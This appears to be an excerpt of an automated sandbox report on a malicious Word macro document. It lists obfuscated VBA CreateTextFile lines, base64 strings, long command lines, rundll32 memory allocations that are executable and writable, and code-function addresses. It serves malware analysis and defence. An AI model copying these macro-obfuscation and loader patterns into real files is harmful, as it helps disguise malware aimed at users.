                      Source: Bestand.docOLE, VBA macro line: Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")
                      Source: Bestand.docOLE, VBA macro line: Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")
                      Source: Bestand.docOLE, VBA macro line: Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")
                      Source: Bestand.docOLE, VBA macro line: Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")
                      Source: Bestand.docOLE, VBA macro line: Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")
                      Source: Bestand.docOLE, VBA macro line: Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")
                      Source: Bestand.docOLE, VBA macro line: Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")
                      Source: Bestand.docOLE, VBA macro line: Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")
                      Source: Bestand.docOLE, VBA macro line: Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")
                      Source: Bestand.docOLE, VBA macro line: Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")
                      Source: Bestand.docOLE, VBA macro line: Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")
                      Source: Bestand.docOLE, VBA macro line: Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")
                      Source: Bestand.docOLE, VBA macro line: Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD")
                      Source: Bestand.docOLE, VBA macro line: Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ")
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String createtextfile: Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")Name: Rvpv59xrvp7m2wb
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String createtextfile: Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")Name: Slz39ct0lz_ksnd
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Zacj6cs0xxmkchq, String createtextfile: Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD")Name: Zacj6cs0xxmkchq
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Zacj6cs0xxmkchq, String createtextfile: Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ")Name: Zacj6cs0xxmkchq
                      Document contains an embedded VBA with base64 encoded stringsShow sources
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String HNkPCvHSVKIC
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String LhUxJGiLUCZp
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String QkKSDHgSXaAA
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String zDOlFEIFBVWkPbIC
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String xfhECJccxFyA
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String wOTiEDqNZtWN
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String xaOQJbzFVCXtJADD
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String YfIwYFFntmmdDsPv
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String nbBVBbrmTJhR
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Rvpv59xrvp7m2wb, String JNHUAINVrwxEKEHD
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String WVtJEvzwejAL
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Slz39ct0lz_ksnd, String YIyOHHHeDXloKIBE
                      Source: VBA code instrumentationOLE, VBA macro: Module A81c_pcot0t3c8, Function Zacj6cs0xxmkchq, String UqiKuFLuUFAG
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5629
                      Source: unknownProcess created: Commandline size = 5533
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5533Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Pqryhcbuipyk\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F7_2_1000976F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C2C637_2_006C2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CB41F7_2_006CB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CC0C67_2_006CC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D38957_2_006D3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CEE787_2_006CEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D02C37_2_006D02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D42DA7_2_006D42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C568E7_2_006C568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C7B637_2_006C7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D4B417_2_006D4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C87367_2_006C8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D687F7_2_006D687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CF4447_2_006CF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CE05A7_2_006CE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D340A7_2_006D340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C88E57_2_006C88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C1CFA7_2_006C1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D20C57_2_006D20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006DA0AF7_2_006DA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C48BD7_2_006C48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C60B97_2_006C60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C80BA7_2_006C80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D889D7_2_006D889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C153C7_2_006C153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CF5367_2_006CF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D0D337_2_006D0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D7D037_2_006D7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D5D1D7_2_006D5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D8D1C7_2_006D8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D511B7_2_006D511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CB1127_2_006CB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D71EF7_2_006D71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D31E27_2_006D31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C69A07_2_006C69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D6DB97_2_006D6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D61B87_2_006D61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CF98C7_2_006CF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D95867_2_006D9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C6D9F7_2_006C6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C79987_2_006C7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D5A617_2_006D5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CEA4C7_2_006CEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C4A357_2_006C4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C9A377_2_006C9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C2A307_2_006C2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D7A0F7_2_006D7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D12E27_2_006D12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D26F57_2_006D26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C96CD7_2_006C96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D8ADC7_2_006D8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C62A37_2_006C62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C12807_2_006C1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CC7697_2_006CC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D0B687_2_006D0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C8F787_2_006C8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C5B797_2_006C5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CE3777_2_006CE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D17737_2_006D1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D23497_2_006D2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D8F497_2_006D8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D9B457_2_006D9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CB75F7_2_006CB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C67547_2_006C6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CBB3A7_2_006CBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D0F0C7_2_006D0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D7F1F7_2_006D7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D2B167_2_006D2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D67E97_2_006D67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CD7EB7_2_006CD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D3FE77_2_006D3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D63C17_2_006D63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C9FDC7_2_006C9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D1BDF7_2_006D1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C17AC7_2_006C17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D73AC7_2_006D73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006D878F7_2_006D878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006C839D7_2_006C839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B41F8_2_0022B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222C638_2_00222C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022EE788_2_0022EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022568E8_2_0022568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002338958_2_00233895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002302C38_2_002302C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C0C68_2_0022C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002342DA8_2_002342DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002287368_2_00228736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00227B638_2_00227B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234B418_2_00234B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002363C18_2_002363C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222A308_2_00222A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229A378_2_00229A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00224A358_2_00224A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023340A8_2_0023340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237A0F8_2_00237A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235A618_2_00235A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023687F8_2_0023687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F4448_2_0022F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022EA4C8_2_0022EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E05A8_2_0022E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002262A38_2_002262A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A0AF8_2_0023A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002280BA8_2_002280BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002260B98_2_002260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002248BD8_2_002248BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002212808_2_00221280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023889D8_2_0023889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002312E28_2_002312E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002288E58_2_002288E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002326F58_2_002326F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00221CFA8_2_00221CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002320C58_2_002320C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002296CD8_2_002296CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238ADC8_2_00238ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00230D338_2_00230D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F5368_2_0022F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022BB3A8_2_0022BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022153C8_2_0022153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237D038_2_00237D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00230F0C8_2_00230F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B1128_2_0022B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232B168_2_00232B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023511B8_2_0023511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237F1F8_2_00237F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235D1D8_2_00235D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238D1C8_2_00238D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C7698_2_0022C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00230B688_2_00230B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002317738_2_00231773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E3778_2_0022E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00228F788_2_00228F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00225B798_2_00225B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239B458_2_00239B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002323498_2_00232349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238F498_2_00238F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002267548_2_00226754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B75F8_2_0022B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002269A08_2_002269A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002217AC8_2_002217AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002373AC8_2_002373AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00236DB98_2_00236DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002361B88_2_002361B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002395868_2_00239586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023878F8_2_0023878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F98C8_2_0022F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002279988_2_00227998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00226D9F8_2_00226D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022839D8_2_0022839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002331E28_2_002331E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00233FE78_2_00233FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022D7EB8_2_0022D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002367E98_2_002367E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002371EF8_2_002371EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231BDF8_2_00231BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229FDC8_2_00229FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AEE789_2_007AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A2C639_2_007A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AB41F9_2_007AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B42DA9_2_007B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B02C39_2_007B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AC0C69_2_007AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B38959_2_007B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A568E9_2_007A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A7B639_2_007A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B4B419_2_007B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A87369_2_007A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B63C19_2_007B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B687F9_2_007B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B5A619_2_007B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AE05A9_2_007AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AEA4C9_2_007AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AF4449_2_007AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A2A309_2_007A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A9A379_2_007A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A4A359_2_007A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B340A9_2_007B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B7A0F9_2_007B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A1CFA9_2_007A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B26F59_2_007B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B12E29_2_007B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A88E59_2_007A88E5
